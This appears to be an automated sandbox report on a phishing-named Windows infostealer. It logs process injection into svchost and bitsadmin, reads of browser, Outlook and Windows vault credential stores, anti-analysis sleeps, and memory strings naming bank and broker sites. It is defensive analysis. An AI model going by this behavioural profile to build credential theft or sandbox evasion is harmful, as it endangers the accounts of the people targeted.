                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002CCE7A GetLastError,FormatMessageW, 0_2_002CCE7A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002BAB84 AdjustTokenPrivileges,CloseHandle, 0_2_002BAB84
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_002BB134
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_002CE1FD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle, 0_2_002C6532
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket, 0_2_002DC18C
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_0028406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_0028406B
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | File created: C:\Users\user\AppData\Local\Temp\aut21DB.tmp
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003196000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4594142282.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4594142282.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2578911012.00000000031BA000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2582758695.00000000031C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OUTSTANDING BALANCE PAYMENT.exe | ReversingLabs: Detection: 39%
                Source: unknown | Process created: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static file information: File size 1213952 > 1048576
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: OUTSTANDING BALANCE PAYMENT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QvLFrfAuvuCLc.exe, 00000004.00000000.2302797977.000000000091E000.00000002.00000001.01000000.00000005.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000000.2455000791.000000000091E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: OUTSTANDING BALANCE PAYMENT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: OUTSTANDING BALANCE PAYMENT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: OUTSTANDING BALANCE PAYMENT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0029E01E LoadLibraryA,GetProcAddress, 0_2_0029E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0029288B push 66002923h; retn 002Fh 0_2_002928E1
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002A6B05 push ecx; ret 0_2_002A6B18
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0122952F push edx; retf 0_2_01229530
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414930 push eax; retf 2_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360225F pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036027FA pushad ; ret 2_2_036027F9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx 2_2_036309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360283D push eax; iretd 2_2_03602858
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0360135F push eax; iretd 2_2_03601369
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002E8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_002E8111
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0029EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_0029EB42
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002A123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_002A123A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\bitsadmin.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe API/Special instruction interceptor: Address: 1228A1C
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\bitsadmin.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0367096E rdtsc 2_2_0367096E
                Source: C:\Windows\SysWOW64\bitsadmin.exe Window / User API: threadDelayed 2470
                Source: C:\Windows\SysWOW64\bitsadmin.exe Window / User API: threadDelayed 7501
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Evaded block: after key decision graph_0-93533
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-93716
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe API coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136 Thread sleep count: 2470 > 30
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136 Thread sleep time: -4940000s >= -30000s
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136 Thread sleep count: 7501 > 30
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3136 Thread sleep time: -15002000s >= -30000s
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856 Thread sleep time: -70000s >= -30000s
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856 Thread sleep count: 32 > 30
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856 Thread sleep time: -48000s >= -30000s
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856 Thread sleep count: 34 > 30
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe TID: 4856 Thread sleep time: -34000s >= -30000s
                Source: C:\Windows\SysWOW64\bitsadmin.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002C6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_002C6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_002C60DD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_002C63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_002CEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002CF56F FindFirstFileW,FindClose, 0_2_002CF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_002CF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002D1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_002D1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_002D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_002D1F94
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe Code function: 0_2_0029DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0029DDC0
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ivebrokers.comVMware20,116964875?x
                Source: z5f52P3-.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: z5f52P3-.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rtal.azure.comVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: discord.comVMware20,11696487552f
                Source: z5f52P3-.5.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                Source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2125931115.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000002.2147151002.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2125849364.0000000001272000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: QeMu6`
                Source: z5f52P3-.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: entralVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: global block list test formVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696487552j
                Source: z5f52P3-.5.dr Binary or memory string: AMC password management pageVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: bitsadmin.exe, 00000005.00000002.4594142282.0000000003142000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.5.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nge Transaction PasswordVMware20`x
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: z5f52P3-.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: firefox.exe, 00000009.00000002.2694650315.0000022FA982C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                Source: z5f52P3-.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: z5f52P3-.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: z5f52P3-.5.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ice.comVMware20,11696487552s
                Source: z5f52P3-.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: z5f52P3-.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552&v
                Source: z5f52P3-.5.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                Source: z5f52P3-.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: z5f52P3-.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: z5f52P3-.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: bitsadmin.exe, 00000005.00000002.4601701765.0000000008132000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ive Brokers - NDCDYNVMware20,11696487552z
